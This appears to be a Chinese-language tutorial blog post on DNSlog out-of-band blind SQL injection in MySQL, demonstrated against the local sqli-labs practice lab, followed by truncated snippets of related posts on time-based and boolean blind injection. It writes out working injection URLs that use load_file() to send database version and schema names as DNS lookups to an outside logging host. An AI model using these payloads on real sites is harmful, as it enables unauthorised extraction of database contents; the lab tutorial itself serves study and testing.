dnslog盲注原理

2022-09-08 10:24:08 字數 2031 閱讀 5751

布林盲注和時間盲注相當於猜單詞的遊戲,我們需要對每一位逐步的猜測,效率很低,需要傳送很多的請求進行判斷,很可能會觸發安全裝置的防護

我們需要一種方式能夠減少請求,直接回顯資料——dnslog注入

dns在解析的時候會留下日誌,通過讀取多級網域名稱的解析日誌,獲取請求資訊

登入**並註冊,得到屬於自己的identifier

先嘗試在終端執行curl dnslog.4ke30o.ceye.io

mysql load_file()函式可以發起請求,load_file()函式操作需要使用者具有file許可權

構造語句,利用load_file()函式發起請求,使用dnslog接收請求,獲取資料

只能在windows系統下使用load_file()發起請求,在linux環境下不能使用load_file()發起請求

使用語句select load_file(concat('\\\\',(select version()),'.mysql.4ke30o.ceye.io\\abc'))

在使用前務必記得設定secure_file_priv為"",我使用的是phpstudy整合環境,所以訪問http://localhost/phpmyadmin4.8.5/來使用sql

重啟mysql服務

使用語句,查詢自己想要的資料,此處查詢版本資訊

以第九關為例(在windows上執行)

使用http://localhost/sqli-labs-master/index.html進入sqlinjection頁面

http://localhost/sqli-labs-master/less-9/?id=1%27%20and%20(select%20load_file(concat(%27\\\\%27,(select%20version()),%27.mysql.4ke30o.ceye.io\\abc%27)))--+
http://localhost/sqli-labs-master/less-9/?id=1%27%20and%20(select%20load_file(concat(%27\\\\%27,(select%20schema_name%20from%20information_schema.schemata%20limit%201,1),%27.mysql.4ke30o.ceye.io\\abc%27)))--+
一般來說,查詢不到就說明語法有問題,可以先在mysql中嘗試,在url中務必記得

1、?id=1』 and

2、and後面的語句要用括號括起來

3、不要忘記注釋掉後面的語句–+或者%23

SQL盲注 時間盲注,dnslog盲注

時間盲注原理 id get id sql select from users where id id limit 0,1 result mysql query sql row mysql fetch array result if row else 存在sql注入漏洞 然而頁面不會回顯資料,也不會回...

sql盲注 解決 DNSLOG 盲注簡單利用

oxo1 前言 眾所周知盲注查詢資料賊慢,利用 dnslog 就可以快速解決這個問題,但是利用條件也挺雞肋的。具體原理請谷歌 1 secure file priv 不能為 null 2 支援 windows,不支援 linux oxo2 工具 oxo3 mysql 1 獲取當前資料庫 and loa...

布林盲注 原理

布林盲注 可以寫指令碼 例如 沒有錯誤提示 也沒有回顯 但是輸入錯誤的話頁面會有反應 也就是說 只有 true 和false 例如 sql labs less 7 它只有兩種提示 所以可以用布林盲注 playload and length database 8 判斷資料庫名長度 是否等於8 如果不等...